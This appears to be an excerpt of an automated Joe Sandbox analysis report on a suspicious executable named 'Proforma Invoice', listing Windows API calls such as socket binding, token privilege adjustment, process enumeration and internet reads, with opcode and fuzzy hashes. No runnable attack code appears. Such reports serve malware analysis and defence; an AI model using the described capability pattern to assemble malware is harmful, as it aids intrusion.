                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                • String ID:
                                                                                                • API String ID: 1279440585-0
                                                                                                • Opcode ID: d45ce1c1b1e390322bc999f146e7ffa388cbd7496e979cdedd165aeda4bcd92a
                                                                                                • Instruction ID: 5db9570424f4b4561f15743f54df3994c7763eb97502f2eacc99f0a869e81d2a
                                                                                                • Opcode Fuzzy Hash: d45ce1c1b1e390322bc999f146e7ffa388cbd7496e979cdedd165aeda4bcd92a
                                                                                                • Instruction Fuzzy Hash: 7621C1306002049FCB10EF68C845A6EB7BAEF45720F24826CF926A73D1C778AC41CB65
                                                                                                APIs
                                                                                                  • Part of subcall function 006C0DB6: std::exception::exception.LIBCMT ref: 006C0DEC
                                                                                                  • Part of subcall function 006C0DB6: __CxxThrowException@8.LIBCMT ref: 006C0E01
                                                                                                • _memmove.LIBCMT ref: 006F0258
                                                                                                • _memmove.LIBCMT ref: 006F036D
                                                                                                • _memmove.LIBCMT ref: 006F0414
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                • String ID:
                                                                                                • API String ID: 1300846289-0
                                                                                                • Opcode ID: e603b8e4fea86f2f0a6f764cde3078d2ee0500204fe0c69c72071c5ed53e1185
                                                                                                • Instruction ID: 8834ac9b1037d0eb1c470d75aa7603bec6313a538a8c8343e12d8c49f4d697a0
                                                                                                • Opcode Fuzzy Hash: e603b8e4fea86f2f0a6f764cde3078d2ee0500204fe0c69c72071c5ed53e1185
                                                                                                • Instruction Fuzzy Hash: 6702AEB1A00209DBDF04DF64D981ABEBBB6EF44300F1480ADE90ADB255EB35ED51CB95
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 006A19FA
                                                                                                • GetSysColor.USER32(0000000F), ref: 006A1A4E
                                                                                                • SetBkColor.GDI32(?,00000000), ref: 006A1A61
                                                                                                  • Part of subcall function 006A1290: DefDlgProcW.USER32(?,00000020,?), ref: 006A12D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ColorProc$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3744519093-0
                                                                                                • Opcode ID: 2b5c683970537eb82759c8ebef768dbf4c16d48969e5e6aa7b113d3b3f2ffe95
                                                                                                • Instruction ID: 3b02548dcc6860b5bf7cf13cc08aafe22ba4c8c8e372603621ac5e0045d729d1
                                                                                                • Opcode Fuzzy Hash: 2b5c683970537eb82759c8ebef768dbf4c16d48969e5e6aa7b113d3b3f2ffe95
                                                                                                • Instruction Fuzzy Hash: 06A16770102594FAE628BB299C58EFF359FDF43341F15411AF602DE396CA289D02DEB9
                                                                                                APIs
                                                                                                  • Part of subcall function 00717D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00717DB6
                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0071679E
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007167C7
                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00716800
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0071680D
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00716821
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                • String ID:
                                                                                                • API String ID: 99427753-0
                                                                                                • Opcode ID: d78325047159ced5da8cfe8906b36a08558d98cee7ad7d56e65b329520c56cc8
                                                                                                • Instruction ID: 8e38db1d34bdfc118f07108131eec151240ca0268bcb4ff5ee841dc148649829
                                                                                                • Opcode Fuzzy Hash: d78325047159ced5da8cfe8906b36a08558d98cee7ad7d56e65b329520c56cc8
                                                                                                • Instruction Fuzzy Hash: 0941E775A002006FDB50BF248C86F7E77E9DF46714F04856CF915AB3C2CA789D018BA5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                • String ID:
                                                                                                • API String ID: 292994002-0
                                                                                                • Opcode ID: af8ebc0f46f8380228ef478b98d1c05efdbeccccfdef3434e2ed184e667d03d6
                                                                                                • Instruction ID: 4f93521708dcab5e3f099fd66d9685b222cb78ff3a29033098cd1c88e7a805dd
                                                                                                • Opcode Fuzzy Hash: af8ebc0f46f8380228ef478b98d1c05efdbeccccfdef3434e2ed184e667d03d6
                                                                                                • Instruction Fuzzy Hash: 9E11C8313005215FDB21AF26EC44A6EBBA9FF457A5B50943DF845D3242CB7CDC028AA8
                                                                                                APIs
                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006F80C0
                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006F80CA
                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006F80D9
                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006F80E0
                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006F80F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                • String ID:
                                                                                                • API String ID: 44706859-0
                                                                                                • Opcode ID: 2339cd246731f8996ba40ab0c3a202ef6f4cfbbb428f2a325b95c3d7aabbbc5e
                                                                                                • Instruction ID: f95caefa7f16d91b49ebecf93cd1dd0979040a452d07842d6e588ca4185efc50
                                                                                                • Opcode Fuzzy Hash: 2339cd246731f8996ba40ab0c3a202ef6f4cfbbb428f2a325b95c3d7aabbbc5e
                                                                                                • Instruction Fuzzy Hash: 49F0C230200209AFEB204FA4EC8DEB73BBDEF49754B404139FA05C3250CB749C12DA60
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,006A4AD0), ref: 006A4B45
                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006A4B57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                • API String ID: 2574300362-192647395
                                                                                                • Opcode ID: 1a4214a4678879c0c7fd08d34e65a86ff6c35869cf629ec32ef1d45feb87e332
                                                                                                • Instruction ID: 835b3d6f46a25168dc9b8700fc9f0bf1d86081478e63da27e4c60c8f5d631212
                                                                                                • Opcode Fuzzy Hash: 1a4214a4678879c0c7fd08d34e65a86ff6c35869cf629ec32ef1d45feb87e332
                                                                                                • Instruction Fuzzy Hash: 99D05BB4A10727CFD7309F31EC18B46B6F5AF45751B11C83DD485D6250DBB8D880CA68
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0071EE3D
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0071EE4B
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0071EF0B
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0071EF1A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2576544623-0
                                                                                                • Opcode ID: 80d2d33037f5b24ab3a9a2c8f1272c3a7c9ca7a6948c129bdbc08431d5a8275b
                                                                                                • Instruction ID: c402a51aeb08b31ec1a1fca58b804fa9271bb787b614452dc0d119e9bae79f54
                                                                                                • Opcode Fuzzy Hash: 80d2d33037f5b24ab3a9a2c8f1272c3a7c9ca7a6948c129bdbc08431d5a8275b
                                                                                                • Instruction Fuzzy Hash: DF519B71504300AFD360EF24CC82EABB7E8EF85700F50482DF995972A1EB74AD08CB96
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006FE628
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen
                                                                                                • String ID: ($|
                                                                                                • API String ID: 1659193697-1631851259
                                                                                                • Opcode ID: 307880885cd1d30bc17d886e150af961905dff333de6e3d1a29290e5cece8e48
                                                                                                • Instruction ID: 1c94ecd91a3aa9494d4d745ebd8738b447ee4f19c02aadfc50b51c5199048573
                                                                                                • Opcode Fuzzy Hash: 307880885cd1d30bc17d886e150af961905dff333de6e3d1a29290e5cece8e48
                                                                                                • Instruction Fuzzy Hash: AC324674A007099FD728DF19C4819AABBF2FF48310B15C46EE99ADB3A1E771E941CB44
                                                                                                APIs
                                                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0071180A,00000000), ref: 007123E1
                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00712418
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                • String ID:
                                                                                                • API String ID: 599397726-0
                                                                                                • Opcode ID: 562892508c3964ba2c5103a5bda80581884aefc20089e77bbcc52f56810c5601
                                                                                                • Instruction ID: 86d1573e707717e887031bd40aa77329681cb07d15fa0e47079f6d21575e887a
                                                                                                • Opcode Fuzzy Hash: 562892508c3964ba2c5103a5bda80581884aefc20089e77bbcc52f56810c5601
                                                                                                • Instruction Fuzzy Hash: 2741F671504209FFEB20DF99DC85FFB77BDEB40314F10402EFA11A6182DA789E929654
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0070B343
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0070B39D
                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0070B3EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                • String ID:
                                                                                                • API String ID: 1682464887-0
                                                                                                • Opcode ID: 868c0cde58cb9cdcc86d090cc1b2e39b81e4a19b2f6919901b484e43170b3c78
                                                                                                • Instruction ID: b445821025dc9a556786829056e959266c7f91225f706d9debe44a4a197b5bcc
                                                                                                • Opcode Fuzzy Hash: 868c0cde58cb9cdcc86d090cc1b2e39b81e4a19b2f6919901b484e43170b3c78
                                                                                                • Instruction Fuzzy Hash: F5215E35A00108EFCB00EFA5D885AEEFBB9FF49314F1481A9E905AB351CB35A916CF54
                                                                                                APIs
                                                                                                  • Part of subcall function 006C0DB6: std::exception::exception.LIBCMT ref: 006C0DEC
                                                                                                  • Part of subcall function 006C0DB6: __CxxThrowException@8.LIBCMT ref: 006C0E01
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006F882B
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006F8858
                                                                                                • GetLastError.KERNEL32 ref: 006F8865
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                • String ID:
                                                                                                • API String ID: 1922334811-0
                                                                                                • Opcode ID: 4631485ebcde3fb3373ff1da0a8cd2f7b31b961713b622c3e424a2a756a44fbf
                                                                                                • Instruction ID: e9e4d103cdefe45f15b6261c473cf77b2ad3702ff5de394520fefa9e44a40d2e
                                                                                                • Opcode Fuzzy Hash: 4631485ebcde3fb3373ff1da0a8cd2f7b31b961713b622c3e424a2a756a44fbf
                                                                                                • Instruction Fuzzy Hash: 7C116DB2814209AFE728DFA4DC85D7BB7BDFB44750B20856EF46697241EA30BC418B64
                                                                                                APIs
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006F8774
                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006F878B
                                                                                                • FreeSid.ADVAPI32(?), ref: 006F879B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                • String ID:
                                                                                                • API String ID: 3429775523-0
                                                                                                • Opcode ID: 24486786ea397d5683d41de759da95b7c5c8f9017366636f95db7bdf444da94f
                                                                                                • Instruction ID: 4f0ab033d4ecfc4b06ce2bb927b48725b989a48e99f86f33e4c8b02513509cff
                                                                                                • Opcode Fuzzy Hash: 24486786ea397d5683d41de759da95b7c5c8f9017366636f95db7bdf444da94f
                                                                                                • Instruction Fuzzy Hash: 06F03C75A1120CBFDB10DFE49D89AADB7B8EF08201F1044A9E501E2181D6755A048B54
                                                                                                APIs
                                                                                                • __time64.LIBCMT ref: 0070889B
                                                                                                  • Part of subcall function 006C520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00708F6E,00000000,?,?,?,?,0070911F,00000000,?), ref: 006C5213
                                                                                                  • Part of subcall function 006C520A: __aulldiv.LIBCMT ref: 006C5233
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                • String ID: 0ev
                                                                                                • API String ID: 2893107130-2059827049
                                                                                                • Opcode ID: fd4fa2ec538d7df9286be1ee366cf15c2971ad5011e12270cfc25dc0b4fdac33
                                                                                                • Instruction ID: 7224dc1bb2aca999f74b040d3b063632a6ee621d7b02cc99e903b38611a6db6e
                                                                                                • Opcode Fuzzy Hash: fd4fa2ec538d7df9286be1ee366cf15c2971ad5011e12270cfc25dc0b4fdac33
                                                                                                • Instruction Fuzzy Hash: 7221B172635610CBC729CF29D841A52B3E1EFA5311B688F6DD0F6CB2C0CA78B905CB94
                                                                                                APIs
                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00704CB3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: mouse_event
                                                                                                • String ID: DOWN
                                                                                                • API String ID: 2434400541-711622031
                                                                                                • Opcode ID: 5f7bfae4cdbe597ac14c7a6cbdd1293a3dbf1d40edb32cb3c02971bd27d5738a
                                                                                                • Instruction ID: 7c3de2e1b41fc88c16262a8e8fb00864befe2054d56752ff6a0dbc42638d2807
                                                                                                • Opcode Fuzzy Hash: 5f7bfae4cdbe597ac14c7a6cbdd1293a3dbf1d40edb32cb3c02971bd27d5738a
                                                                                                • Instruction Fuzzy Hash: 4EE08CB619D7227CF9442A19BC07EF7038C8B1633AB10025AFD10E50C1ED8C2C8624FD
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0070C6FB
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070C72B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: e881789b072c62becb789e2881e312222a17931223b158ee9cead0ae1e6b4722
                                                                                                • Instruction ID: 5005c85254616fb6db3265a77a084bd6651da0ab229dcf9026aee1b5ab3e297c
                                                                                                • Opcode Fuzzy Hash: e881789b072c62becb789e2881e312222a17931223b158ee9cead0ae1e6b4722
                                                                                                • Instruction Fuzzy Hash: 8811A1726002049FDB10EF29C845A2AF7E9FF85320F108A1DF9A9D7291DB38AC01CF95
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00719468,?,0072FB84,?), ref: 0070A097
                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00719468,?,0072FB84,?), ref: 0070A0A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                • String ID:
                                                                                                • API String ID: 3479602957-0
                                                                                                • Opcode ID: e8b38e418587d030f7904073afe83cb2af4343673ebe30ba6f6e5309d2296558
                                                                                                • Instruction ID: 4fdbeab10f68b44f7fe8dc6d0dd44d7c6d4a007a43bf430279fe8e76e80cd21d
                                                                                                • Opcode Fuzzy Hash: e8b38e418587d030f7904073afe83cb2af4343673ebe30ba6f6e5309d2296558
